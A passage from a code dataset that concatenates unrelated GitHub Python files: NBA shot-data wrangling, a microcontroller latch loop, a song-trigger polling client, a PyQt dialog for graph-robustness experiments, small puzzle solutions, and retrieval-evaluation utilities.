data frame containing only the shot log observations pertaining to a field goal\ngame_log_shots_only = game_log[game_log['shot_or_not'] > 0]\ngame_log_shots_only.describe # we need to reset the index values\ngame_log_shots_only.reset_index(inplace = True)\ngame_log_shots_only.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\", index = False)\n\ngame_log_shots_only = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\")\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAshots_2014_2.csv\")\n\n# convert game clock values to seconds for shot log\nfor i in range(0,len(shot_log.GAME_CLOCK)):\n time = re.split(':', shot_log.loc[i,'GAME_CLOCK'])\n shot_log.loc[i,'GAME_CLOCK'] = int(time[0])*60 + int(time[1])\n\n# convert game clock values to seconds for game log shot observations\nfor i in range(0,len(game_log_shots_only.PCTIMESTRING)):\n time = re.split(':', game_log_shots_only.PCTIMESTRING[i])\n game_log_shots_only.loc[i,'PCTIMESTRING'] = int(time[0])*60 + int(time[1])\n \n# convert game clock values to seconds for entire game log\nfor i in range(0,len(game_log.PCTIMESTRING)):\n time = re.split(':', game_log.PCTIMESTRING[i])\n game_log.loc[i,'PCTIMESTRING'] = int(time[0])*60 + int(time[1])\n\n# use game clock second values calculated above along with the period for each observation\n# to compute a new variable indicating home many seconds are left in the game\nshot_log['Time_left'] = (48-12*shot_log.PERIOD)*60 + shot_log.GAME_CLOCK\ngame_log_shots_only['Time_left'] = (48-12*game_log_shots_only.PERIOD)*60 + game_log_shots_only.PCTIMESTRING\ngame_log['Time_left'] = (48-12*game_log.PERIOD)*60 + game_log.PCTIMESTRING\n\n\n# as it stands, the timeleft is off for corresponding observations of the 2 data frames by a few seconds\n# take the gamelog times left as a reference and set the shotlog times left as the gamelog time that is\n# closest to each time.\n\ngame_log_shots_only = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\")\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear 
models/Final Project/NBAshots_2014_2.csv\")\n\n# Create list of set of all game IDs from 2014\ngames = shot_log.GAME_ID.unique() \ngame_count = 0\nshot_count = 0\n\n# The .loc method fails the first times it's called in the code, so I'm running it here with a dummy variable\nshot_log_dummy = shot_log[shot_log.GAME_ID == games[0]]\nshot_log_dummy.loc[game_count,'Time_left'] = 0\nshot_log_dummy.loc[game_count,'Time_left'] = 0\n\n# Adjust code below to find index of minimum time returned. Then we can check to see if the player ID\n# in the gamelog corresponding to that index is the same as player ID for the shot being considered\n\nfor game in games:\n #print(game) \n shot_count = 0\n game_log_dummy = game_log_shots_only[game_log_shots_only.GAME_ID == game]\n shot_log_dummy = shot_log[shot_log.GAME_ID == game] \n shot_log_dummy = shot_log_dummy.reset_index(drop=True)\n shot_log_dummy2 = shot_log[shot_log.GAME_ID == game]\n shot_log_dummy2 = shot_log_dummy2.reset_index(drop=True)\n while (len(shot_log_dummy) > 1):\n gl_times = game_log_dummy.Time_left\n close_time = min(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[1]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0] \n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[2]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and 
shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[3]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n shot_log_dummy = shot_log_dummy.drop(shot_log_dummy.index[0]) \n shot_count += 1\n #print(shot_count)\n \n if(game_count == 0):\n new_shot_log = shot_log_dummy2\n elif (game_count > 0):\n new_shot_log = pd.concat([new_shot_log,shot_log_dummy2]) \n game_count += 1\n print(game_count)\n\n\n\n\n# add in a shot_or_not variable so that shots don't incorrectly join on other events\nnew_shot_log['shot_or_not'] = 1\n\n\n# left outer join data sets (game_log on left) on the columns for GAME_ID, Time_left, PlayerID, and shot_or_not\n\nnew_game_log = pd.merge(game_log, new_shot_log, how='left', on=['GAME_ID', 'Time_left','PlayerID','shot_or_not'], sort=False)\n \n \nnew_game_log.to_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined.csv\", index = False)\n \n \n\n###################################################################################################\n#\n# Add in last year's FG % for player taking the shot, and FG % allowed for the closest defender\n#\n###################################################################################################\n\nmerged_game_log = pd.read_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined.csv\")\nshots_2013 = pd.read_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBAshots_2013.csv\")\n\n\nshot_attempts = pd.DataFrame(shots_2013.groupby('PlayerID')['FGM'].count())\nshot_attempts['PlayerID'] = shot_attempts.index\n\nshot_made = pd.DataFrame(shots_2013.groupby('PlayerID')['FGM'].sum())\nshot_made['PlayerID'] = shot_made.index\n\ntotal_FGperc = pd.merge(shot_attempts, shot_made, how='left', on=['PlayerID'], sort=False)\ntotal_FGperc['FGperc'] = total_FGperc['FGM_y']/total_FGperc['FGM_x']\n\ntotal_FGperc['shot_or_not'] = 1\n\n\nmerged_game_log = pd.merge(merged_game_log, total_FGperc, how='left', on=['PlayerID','shot_or_not'], sort=False)\n\n######################################################################################\n\ndef_shot_attempts = pd.DataFrame(shots_2013.groupby('CLOSEST_DEFENDER_PLAYER_ID')['FGM'].count())\ndef_shot_attempts['CLOSEST_DEFENDER_PLAYER_ID'] = def_shot_attempts.index\n\ndef_shot_made = pd.DataFrame(shots_2013.groupby('CLOSEST_DEFENDER_PLAYER_ID')['FGM'].sum())\ndef_shot_made['CLOSEST_DEFENDER_PLAYER_ID'] = 
def_shot_made.index\n\ndef_total_FGperc = pd.merge(def_shot_attempts, def_shot_made, how='left', on=['CLOSEST_DEFENDER_PLAYER_ID'], sort=False)\ndef_total_FGperc['DefFGperc'] = def_total_FGperc['FGM_y']/def_total_FGperc['FGM_x']\n\ndef_total_FGperc['shot_or_not'] = 1\n\n\nmerged_game_log = pd.merge(merged_game_log, def_total_FGperc, how='left', on=['CLOSEST_DEFENDER_PLAYER_ID','shot_or_not'], sort=False)\n\nmerged_game_log.to_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined_FGperc.csv\", index = False)\n\n\n\n\n\n#########################################################################################\n# Below is the code to add time_in_game variable after data set has been further modified.\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport math\n\nmaster = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBA_2014_combined_FGperc_withposition_subs.csv\")\n\n# Create list of set of all game IDs from 2014\ngames = list(master.GAME_ID.unique())\ngames = games[0:10]\n\n\n#game = games[0]\n\n#master = master[master['GAME_ID'].isin(games)]\n# Create new variable time_sub and initialize it to NA\nmaster['time_sub'] = np.NaN\n\n\nfor game in games:\n print(game)\n game_events = master[master['GAME_ID'] == game]\n players = list(master[master['GAME_ID'] == game].PlayerID.unique())\n for player in players:\n #print(player)\n events1 = game_events[game_events['PlayerID'] == player]\n events1 = events1[events1['Time_left'] >= 1440] \n events2 = game_events[game_events['PlayerID'] == player]\n events2 = events2[events2['Time_left'] < 1440]\n indices1 = events1.index.get_values()\n indices2 = events2.index.get_values()\n for i in range(0, len(events1)):\n index = indices1[i]\n if (events1.shot_or_not[index] == 0):\n continue\n else:\n sub_i = np.NaN\n if(len(events1[events1['SUBIN'] == player])>0):\n sub_i = events1[events1['SUBIN'] == player]\n sub_i = sub_i[sub_i['SUBIN'].index < i]\n sub_i = sorted(sub_i, reverse = True)[0]\n if (np.isnan(sub_i) != True):\n master.loc[index, 'time_sub'] = events1.loc[sub_i, 'Time_left'] - events1.loc[index, 'Time_left']\n else:\n master.loc[index, 'time_sub'] = 2880 - events1.loc[index, 'Time_left']\n \n for i in range(0, len(events2)):\n index = indices2[i]\n if (events2.shot_or_not[index] == 0):\n continue\n else:\n sub_i = np.NaN\n if(len(events2[events2['SUBIN'] == player])>0):\n sub_i = events2[events2['SUBIN'] == player]\n sub_i = sub_i[sub_i['SUBIN'].index < index]\n sub_i = sorted(sub_i, reverse = True)[0]\n if (np.isnan(sub_i) != True):\n master.loc[index, 'time_sub'] = events2.loc[sub_i, 'Time_left'] - events2.loc[index, 'Time_left']\n else:\n master.loc[index, 'time_sub'] = 1440 - events2.loc[index, 'Time_left']\n \n\n# Fill in missing scoremargin values with previous score\nmaster['SCOREMARGIN'] = master['SCOREMARGIN'].fillna(method = 'ffill')\n\n# Flip the margin values for the away team so each margin shows how much the team shooting is down\nfor i in range(0,len(master)):\n if (master.loc[i,'LOCATION'] == 'A'):\n if (master.loc[i, 'SCOREMARGIN'] == 'TIE'):\n break\n elif np.isnan(int(master.loc[i, 'SCOREMARGIN'])):\n break\n else:\n master.loc[i, 'SCOREMARGIN'] = -(int(master.loc[i,'SCOREMARGIN'])) \n\n\n\n# Export master to csv file\nmaster.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBA_2014_Final_Combined\", index = False) \n \n \n\n\n \n \n 
\n","repo_name":"dannydongheon93/NBA-FG-Prediction-Model","sub_path":"nba_wrangling_final.py","file_name":"nba_wrangling_final.py","file_ext":"py","file_size_in_byte":15291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7973673762","text":"arranque = 0\nenclavamiento = 0\nparo = 0\nestado = 0\n\ndef setup():\n pinMode(2, INPUT)\n pinMode(0, INPUT)\n pinMode(13, OUTPUT)\n pinMode(5, OUTPUT)\n\ndef loop():\n global arranque, enclavamiento, paro, estado\n arranque = digitalRead(2)\n paro = digitalRead(0)\n enclavamiento = estado\n if arranque == HIGH:\n estado = 1\n if estado == 1:\n digitalWrite(13, LOW)\n digitalWrite(5, HIGH)\n print(\"encendido el 5\")\n else:\n digitalWrite(13, HIGH)\n digitalWrite(5, LOW)\n print(\"encendido el 13\")\n if paro == HIGH:\n estado = 0","repo_name":"Dispositivos-Edificio-Bioclimatico/ejemplos_librerias","sub_path":"CODIGOS PARA PYTHON/base_de_enclavamiento/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70744636484","text":"import sleep\nimport requests\n\nSERVER_URL = \"http://ajfjf:8000\"\n\ndef go():\n while True:\n r = requests.get(f\"{SERVER_URL}/status\")\n if r.text == \"PLAY_SONG\":\n break\n sleep(0.1)\n \n # play the song\n print(\"PLAYING THE SONG\")","repo_name":"lhorgan/xmas","sub_path":"laptop/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36134831866","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Graph program\")\n Dialog.resize(390, 300)\n Dialog.setFixedSize(390, 300)\n\n self.generateComboBox = QtWidgets.QComboBox(Dialog)\n self.generateComboBox.setGeometry(QtCore.QRect(210, 10, 175, 25))\n self.generateComboBox.setObjectName(\"generateComboBox\")\n self.generateComboBox.addItem(\"\")\n self.generateComboBox.addItem(\"\")\n self.generateComboBox.addItem(\"\")\n self.generateLabel = QtWidgets.QLabel(Dialog)\n self.generateLabel.setGeometry(QtCore.QRect(10, 10, 180, 25))\n self.generateLabel.setObjectName(\"generateLabel\")\n\n self.attackLabel = QtWidgets.QLabel(Dialog)\n self.attackLabel.setGeometry(QtCore.QRect(10, 40, 180, 25))\n self.attackLabel.setObjectName(\"attackLabel\")\n self.attackComboBox = QtWidgets.QComboBox(Dialog)\n self.attackComboBox.setGeometry(QtCore.QRect(210, 40, 175, 25))\n self.attackComboBox.setObjectName(\"attackComboBox\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n\n self.sizeLabel = QtWidgets.QLabel(Dialog)\n self.sizeLabel.setGeometry(QtCore.QRect(10, 70, 180, 25))\n self.sizeLabel.setObjectName(\"sizeLabel\")\n self.sizeBox = QtWidgets.QSpinBox(Dialog)\n self.sizeBox.setGeometry(QtCore.QRect(210, 70, 175, 25))\n self.sizeBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))\n self.sizeBox.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.sizeBox.setAutoFillBackground(False)\n self.sizeBox.setMaximum(10000)\n self.sizeBox.setProperty(\"value\", 100)\n self.sizeBox.setObjectName(\"sizeBox\")\n\n self.rewritingBox = QtWidgets.QSpinBox(Dialog)\n self.rewritingBox.setGeometry(QtCore.QRect(210, 
100, 175, 25))\n self.rewritingBox.setMinimum(1)\n self.rewritingBox.setProperty(\"value\", 5)\n self.rewritingBox.setObjectName(\"rewritingBox\")\n self.nodesLabel = QtWidgets.QLabel(Dialog)\n self.nodesLabel.setGeometry(QtCore.QRect(10, 100, 200, 25))\n self.nodesLabel.setObjectName(\"nodesLabel\")\n\n self.retryBox = QtWidgets.QSpinBox(Dialog)\n self.retryBox.setGeometry(QtCore.QRect(210, 130, 175, 25))\n self.retryBox.setMaximum(10000)\n self.retryBox.setProperty(\"value\", 1000)\n self.retryBox.setObjectName(\"retryBox\")\n self.retryLabel = QtWidgets.QLabel(Dialog)\n self.retryLabel.setGeometry(QtCore.QRect(10, 130, 200, 16))\n self.retryLabel.setObjectName(\"retryLabel\")\n\n self.seedBox = QtWidgets.QSpinBox(Dialog)\n self.seedBox.setEnabled(False)\n self.seedBox.setGeometry(QtCore.QRect(210, 160, 175, 25))\n self.seedBox.setObjectName(\"seedBox\")\n self.seedCheckBox = QtWidgets.QCheckBox(Dialog)\n self.seedCheckBox.setGeometry(QtCore.QRect(190, 160, 16, 25))\n self.seedCheckBox.setText(\"\")\n self.seedCheckBox.setObjectName(\"seedCheckBox\")\n self.seedLabel = QtWidgets.QLabel(Dialog)\n self.seedLabel.setGeometry(QtCore.QRect(10, 160, 180, 25))\n self.seedLabel.setObjectName(\"seedLabel\")\n\n self.progressBar = QtWidgets.QProgressBar(Dialog)\n self.progressBar.setEnabled(False)\n self.progressBar.setGeometry(QtCore.QRect(10, 200, 380, 25))\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n\n self.startButton = QtWidgets.QPushButton(Dialog)\n self.startButton.setGeometry(QtCore.QRect(145, 250, 100, 25))\n self.startButton.setObjectName(\"startButton\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle('Graphs')\n Dialog.setWindowIcon(QIcon('main.png'))\n self.startButton.setText(_translate(\"Dialog\", \"Start\"))\n self.generateLabel.setText(_translate(\"Dialog\", \"Метод генерации графа\"))\n self.attackLabel.setText(_translate(\"Dialog\", \"Метод атаки на граф\"))\n self.sizeLabel.setText(_translate(\"Dialog\", \"Количество вершин у графа\"))\n self.generateComboBox.setItemText(0, _translate(\"Dialog\", \"Случайный\"))\n self.generateComboBox.setItemText(1, _translate(\"Dialog\", \"Барабаши-Альберт\"))\n self.generateComboBox.setItemText(2, _translate(\"Dialog\", \"Ватц-Строгац\"))\n self.attackComboBox.setItemText(0, _translate(\"Dialog\", \"Случайная\"))\n self.attackComboBox.setItemText(1, _translate(\"Dialog\", \"Максимальная связность\"))\n self.attackComboBox.setItemText(2, _translate(\"Dialog\", \"Минимальная связность\"))\n self.attackComboBox.setItemText(3, _translate(\"Dialog\", \"Центральность\"))\n self.attackComboBox.setItemText(4, _translate(\"Dialog\", \"Центральность с перерасчётом\"))\n self.attackComboBox.setItemText(5, _translate(\"Dialog\", \"Кластеризация\"))\n self.nodesLabel.setText(_translate(\"Dialog\", \"Cреднее количество узлов у вершин\"))\n self.seedLabel.setText(_translate(\"Dialog\", \"Задать определенное значение?\"))\n self.retryLabel.setText(_translate(\"Dialog\", \"Введите количество повторов\"))\n","repo_name":"Elektro33rus/graphs","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7332708634","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n ss = str(bin(n)).lstrip('0b')\n ss = 
list(reversed(ss))\n answer = []\n for i in range(len(ss)):\n if ss[i] == '1':\n answer.append(i)\n\n for i in answer:\n print(i, end=' ')\n print()\n","repo_name":"halfTaim/Algorithm","sub_path":"9월/CB/이진수.py","file_name":"이진수.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5794919044","text":"# Time: 2022-08-24 09:29:28\n# title: Sideways Sorting\n# language: Python 3\n\n\nwhile 1:\n r,c = map(int, input().split())\n if r+c == 0:\n break\n a = []\n for i in range(r):\n a.append(input())\n b = []\n for i in range(c):\n s = ''\n for j in range(r):\n s += a[j][i]\n b.append(s)\n b = sorted(b, key=str.casefold)\n\n for i in range(r):\n s = ''\n for j in range(c):\n s += b[j][i]\n print(s)\n print()\n","repo_name":"mukerem/ICPC-Journey","sub_path":"Code site scrapping/kattis/archive/sidewayssorting.py","file_name":"sidewayssorting.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"7544718247","text":"from collections import namedtuple\nfrom os.path import join\n\nimport faiss\nimport numpy as np\nfrom pynvml import *\nfrom scipy import stats\nfrom scipy.io import loadmat\nfrom scipy.optimize import least_squares\nfrom skimage import io\n\n\ndef linear_fit(x, y, w, report_error=False):\n def cost(p, x, y, w):\n k = p[0]\n b = p[1]\n error = y - (k * x + b)\n error *= w\n return error\n\n p_init = np.array([-1, 1])\n ret = least_squares(cost, p_init, args=(x, y, w), verbose=0)\n # print(ret['x'][0], ret['x'][1], )\n y_fitted = ret['x'][0] * x + ret['x'][1]\n error = ret['cost']\n if report_error:\n return y_fitted, error\n else:\n return y_fitted\n\n\ndef reduce_sigma(sigma, std_or_sq, log_or_linear, hmean_or_mean):\n ''' \n input sigma: sigma^2, ([1, D])\n output sigma: sigma, (1)\n '''\n if log_or_linear == 'log':\n print('log')\n sigma = np.log(sigma)\n elif log_or_linear == 'linear':\n pass\n else:\n raise NameError('undefined')\n\n if std_or_sq == 'std':\n sigma = np.sqrt(sigma)\n elif std_or_sq == 'sq':\n pass\n else:\n raise NameError('undefined')\n\n if hmean_or_mean == 'hmean':\n sigma = stats.hmean(sigma, axis=1) # ([numQ,])\n elif hmean_or_mean == 'mean':\n sigma = np.mean(sigma, axis=1) # ([numQ,])\n else:\n raise NameError('undefined')\n\n return sigma\n\n\ndef schedule_device():\n ''' output id of the graphic card with most free memory\n '''\n nvmlInit()\n deviceCount = nvmlDeviceGetCount()\n frees = []\n for i in range(deviceCount):\n handle = nvmlDeviceGetHandleByIndex(i)\n # print(\"GPU\", i, \":\", nvmlDeviceGetName(handle))\n info = nvmlDeviceGetMemoryInfo(handle)\n frees.append(info.free / 1e9)\n nvmlShutdown()\n # print(frees)\n id = frees.index(max(frees))\n # print(id)\n return id\n\ndef light_log(path, args):\n with open(join(path, 'screen.log'), 'a') as f:\n for arg in args:\n f.write(arg)\n f.flush()\n print(arg, end='')\n\n\ndef cal_recall_from_embeddings(gt, qFeat, dbFeat):\n n_values = [1, 5, 10]\n\n # ---------------------------------------------------- sklearn --------------------------------------------------- #\n # knn = NearestNeighbors(n_jobs=-1)\n # knn.fit(dbFeat)\n # dists, predictions = knn.kneighbors(qFeat, len(dbFeat))\n\n # --------------------------------- use faiss to do NN search -------------------------------- #\n faiss_index = faiss.IndexFlatL2(qFeat.shape[1])\n faiss_index.add(dbFeat)\n dists, predictions = faiss_index.search(qFeat, 
max(n_values)) # the results is sorted\n\n recall_at_n = cal_recall(predictions, gt, n_values)\n return recall_at_n\n\n\ndef cal_recall(ranks, pidx, ks):\n\n recall_at_k = np.zeros(len(ks))\n for qidx in range(ranks.shape[0]):\n for i, k in enumerate(ks):\n if np.sum(np.in1d(ranks[qidx, :k], pidx[qidx])) > 0:\n recall_at_k[i:] += 1\n break\n\n recall_at_k /= ranks.shape[0]\n\n return recall_at_k * 100.0\n\n\ndef cal_apk(pidx, rank, k):\n if len(rank) > k:\n rank = rank[:k]\n\n score = 0.0\n num_hits = 0.0\n\n for i, p in enumerate(rank):\n if p in pidx and p not in rank[:i]:\n num_hits += 1.0\n score += num_hits / (i + 1.0)\n\n return score / min(len(pidx), k) * 100.0\n\n\ndef cal_mapk(ranks, pidxs, k):\n\n return np.mean([cal_apk(a, p, k) for a, p in zip(pidxs, ranks)])\n\n\ndef get_zoomed_bins(sigma, num_of_bins):\n s_min = np.min(sigma)\n s_max = np.max(sigma)\n print(s_min, s_max)\n bins_parent = np.linspace(s_min, s_max, num=num_of_bins)\n k = 0\n while True:\n indices = []\n bins_child = np.linspace(bins_parent[0], bins_parent[-1 - k], num=num_of_bins)\n for index in range(num_of_bins - 1):\n target_q_ind_l = np.where(sigma >= bins_child[index])\n if index != num_of_bins - 2:\n target_q_ind_r = np.where(sigma < bins_child[index + 1])\n else:\n target_q_ind_r = np.where(sigma <= bins_child[index + 1])\n target_q_ind = np.intersect1d(target_q_ind_l[0], target_q_ind_r[0])\n indices.append(target_q_ind)\n # if len(indices[-1]) > int(sigma.shape[0] * 0.0005):\n if len(indices[-1]) > int(sigma.shape[0] * 0.001) or k == num_of_bins - 2:\n break\n else:\n k = k + 1\n # print('{:.3f}'.format(sum([len(x) for x in indices]) / sigma.shape[0]), [len(x) for x in indices])\n # print('k=', k)\n return indices, bins_child, k\n\n\ndef bin_pr(preds, dists, gt, vis=False):\n # dists_m = np.around(dists[:, 0], 2) # (4620,)\n # dists_u = np.array(list(set(dists_m)))\n # dists_u = np.sort(dists_u) # small > large\n\n dists_u = np.linspace(np.min(dists[:, 0]), np.max(dists[:, 0]), num=100)\n\n recalls = []\n precisions = []\n for th in dists_u:\n TPCount = 0\n FPCount = 0\n FNCount = 0\n TNCount = 0\n for index_q in range(dists.shape[0]):\n # Positive\n if dists[index_q, 0] < th:\n # True\n if np.any(np.in1d(preds[index_q, 0], gt[index_q])):\n TPCount += 1\n else:\n FPCount += 1\n else:\n if np.any(np.in1d(preds[index_q, 0], gt[index_q])):\n FNCount += 1\n else:\n TNCount += 1\n assert TPCount + FPCount + FNCount + TNCount == dists.shape[0], 'Count Error!'\n if TPCount + FNCount == 0 or TPCount + FPCount == 0:\n # print('zero')\n continue\n recall = TPCount / (TPCount + FNCount)\n precision = TPCount / (TPCount + FPCount)\n recalls.append(recall)\n precisions.append(precision)\n if vis:\n from matplotlib import pyplot as plt\n plt.style.use('ggplot')\n fig = plt.figure(figsize=(5, 5))\n ax = fig.add_subplot(111)\n ax.plot(recalls, precisions)\n ax.set_title('Precision-Recall')\n ax.set_xlabel('Recall')\n ax.set_ylabel('Precision')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n plt.savefig('pr.png', dpi=200)\n return recalls, precisions\n\n\n\ndef parse_dbStruct_pitts(path):\n dbStruct = namedtuple('dbStruct', ['whichSet', 'dataset', 'dbImage', 'utmDb', 'qImage', 'utmQ', 'numDb', 'numQ', 'posDistThr', 'posDistSqThr', 'nonTrivPosDistSqThr'])\n\n mat = loadmat(path)\n matStruct = mat['dbStruct'].item()\n\n dataset = 'pitts'\n\n whichSet = matStruct[0].item()\n\n # .mat file is generated by python, I replace the use of cell (in Matlab) with char (in Python)\n dbImage = [f[0].item() for f in matStruct[1]]\n # 
dbImage = matStruct[1]\n utmDb = matStruct[2].T\n # utmDb = matStruct[2]\n\n # .mat file is generated by python, I replace the use of cell (in Matlab) with char (in Python)\n qImage = [f[0].item() for f in matStruct[3]]\n # qImage = matStruct[3]\n utmQ = matStruct[4].T\n # utmQ = matStruct[4]\n\n numDb = matStruct[5].item()\n numQ = matStruct[6].item()\n\n posDistThr = matStruct[7].item()\n posDistSqThr = matStruct[8].item()\n nonTrivPosDistSqThr = matStruct[9].item()\n\n return dbStruct(whichSet, dataset, dbImage, utmDb, qImage, utmQ, numDb, numQ, posDistThr, posDistSqThr, nonTrivPosDistSqThr)\n\ndef cal_hs(img_path):\n img = io.imread(img_path, as_gray=True).reshape(-1, 1)\n counts, bins = np.histogram((img * 255).astype(np.int16), np.arange(0, 256, 1))\n counts = counts / np.sum(counts)\n cumulative = np.cumsum(counts)\n in_min = np.min((img*255).astype(np.int16))\n in_max = np.max((img*255).astype(np.int16))\n per_75 = np.argwhere(cumulative < 0.75)[-1]\n per_25 = np.argwhere(cumulative < 0.25)[-1]\n hs = (per_75 - per_25)/255\n return hs\n\nif __name__ == '__main__':\n pass\n","repo_name":"ramdrop/stun","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"99"} +{"seq_id":"31477938766","text":"import time\r\nt_import_0 = time.perf_counter() #to measure performance\r\nimport axelrod as axl\r\nfrom axelrod.graph import Graph\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom GraphGenerator import GraphGenerator\r\nt_import_1 = time.perf_counter()\r\nprint(f\"Imports took {t_import_1-t_import_0:0.5f} seconds\")\r\n\r\ndef main():\r\n #randomly chosen list of strategies\r\n players = [axl.Cooperator(), axl.Defector(),\r\n axl.TitForTat(), axl.Grudger(),\r\n axl.Alternator(), axl.AdaptorBrief(),\r\n axl.AdaptorLong(), axl.Random(),\r\n axl.Retaliate(), axl.Punisher()]\r\n #initiate graph for visualisation and automatic edge production\r\n gen_graph = GraphGenerator(players)\r\n '''\r\n Now create the edges for axelrod\r\n GraphGenerator will do this automatically for some graph types\r\n but a properly formatted list may also be supplied\r\n if a 